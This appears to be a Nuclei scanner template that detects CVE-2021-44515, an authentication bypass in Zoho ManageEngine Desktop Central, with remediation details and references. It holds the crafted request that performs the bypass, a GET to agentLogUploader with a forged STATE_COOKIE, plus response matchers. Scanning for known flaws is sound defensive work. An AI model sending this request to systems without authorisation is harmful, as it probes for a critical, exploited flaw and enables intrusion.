id: CVE-2021-44515 info: name: Zoho ManageEngine Desktop Central - Remote Code Execution author: Adam Crosser severity: critical description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server. remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. reference: - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp - https://nvd.nist.gov/vuln/detail/CVE-2021-44515 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44515 cwe-id: CWE-287 epss-score: 0.97297 epss-percentile: 0.99821 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:* metadata: max-request: 1 vendor: zohocorp product: manageengine_desktop_central tags: cve,cve2021,zoho,rce,manageengine,kev http: - raw: - | GET /STATE_ID/123/agentLogUploader HTTP/1.1 Host: {{Hostname}} Cookie: STATE_COOKIE=&_REQS/_TIME/123 matchers-condition: and matchers: - type: dsl dsl: - "len(body) == 0" - type: word part: header words: - "UEMJSESSIONID=" - type: status status: - 200 # digest: 4a0a00473045022022942af9ce446542ce676958e1e1ac5492a9051d1cd3d1765d585e07a754283d02210096d0e9bce6c0dc7d629fc712f7c35e08736628529eab80e972b37dc67cf826d9:922c64590222798bb761d5b6d8e72950